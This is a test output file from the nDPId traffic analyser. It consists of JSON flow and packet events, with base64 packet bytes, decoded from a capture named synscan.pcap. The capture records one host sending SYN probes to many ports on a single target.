-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"synscan.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAs05oAADgGPNisEAAIQA2GNIzTBi\/dU4MZAAAAAGACBAAuXQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":232,"source":"synscan.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27355,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"synscan.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/+QAADUGE46sEAAIQA2GNIzTatvdU4MZAAAAAGACCADFsAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"synscan.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"synscan.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsD6EAADkG\/9GsEAAIQA2GNIzTJqrdU4MZAAAAAGACCAAJ4gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"synscan.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"synscan.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsihkAACcGl1msEAAIQA2GNIzTFsHdU4MZAAAAAGACEAARywAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"synscan.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1641,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"synscan.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsQFEAADgG0CGsEAAIQA2GNIzTBmndU4MZAAAAAGACBAAuIwAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"synscan.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"synscan.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAs+A4AACkGJ2SsEAAIQA2GNIzTgADdU4MZAAAAAGACCACwiwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"synscan.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9575,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"synscan.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsyBsAADAGUFesEAAIQA2GNIzTJWfdU4MZAAAAAGACBAAPJQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"synscan.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"synscan.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsr+YAAC4GaoysEAAIQA2GNIzTBBPdU4MZAAAAAGACDAAoeQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":239,"source":"synscan.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"synscan.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsVHsAAC4GxfesEAAIQA2GNIzTD6DdU4MZAAAAAGACDAAc7AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":240,"source":"synscan.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058406,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"synscan.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1278275058406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058406,"pkt":"ACYLMQczACWzv5HuCABFAAAsv0EAADsGTjGsEAAIQA2GNIzTBZndU4MZAAAAAGACEAAi8wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"synscan.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058406,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6669,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"synscan.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1278275058406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058406,"pkt":"ACYLMQczACWzv5HuCABFAAAsnBAAADUGd2KsEAAIQA2GNIzTGg3dU4MZAAAAAGACCAAWfwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":242,"source":"synscan.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"synscan.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAssvkAAC0GaHmsEAAIQA2GNIzTI2\/dU4MZAAAAAGACCAANHQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":243,"source":"synscan.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"synscan.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsYaYAACsGu8ysEAAIQA2GNIzTIzLdU4MZAAAAAGACEAAFWgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":244,"source":"synscan.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":765,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":244,"source":"synscan.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsqmkAAC8GbwmsEAAIQA2GNIzTAv3dU4MZAAAAAGACEAAljwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"synscan.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"synscan.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsJaUAACsG982sEAAIQA2GNIzTCDPdU4MZAAAAAGACEAAgWQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"synscan.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8649,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"synscan.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAs0Q0AADYGQWWsEAAIQA2GNIzTIcndU4MZAAAAAGACDAAKwwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":247,"source":"synscan.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"synscan.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsN7MAACsG5b+sEAAIQA2GNIzTBFfdU4MZAAAAAGACEAAkNQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"synscan.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1064,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"synscan.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsBlAAADkGCSOsEAAIQA2GNIzTBCjdU4MZAAAAAGACCAAsZAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"synscan.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"synscan.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsHiIAACwG\/lCsEAAIQA2GNIzTBEfdU4MZAAAAAGACBAAwRQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"synscan.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"synscan.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsYccAAC4GuKusEAAIQA2GNIzTE6ndU4MZAAAAAGACDAAY4wAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":251,"source":"synscan.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"synscan.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAswmkAADEGVQmsEAAIQA2GNIzTC\/\/dU4MZAAAAAGACCAAkjQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"synscan.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"synscan.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsPAwAACwG4GasEAAIQA2GNIzTGY\/dU4MZAAAAAGACBAAa\/QAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"synscan.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"synscan.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsbAwAADAGrGasEAAIQA2GNIzTAyjdU4MZAAAAAGACBAAxZAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"synscan.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"synscan.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsBZkAACgGGtqsEAAIQA2GNIzTd\/7dU4MZAAAAAGACBAC8jQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"synscan.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"synscan.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAs4HIAADEGNwCsEAAIQA2GNIzTBC\/dU4MZAAAAAGACCAAsXQAAAgQFtA=="} 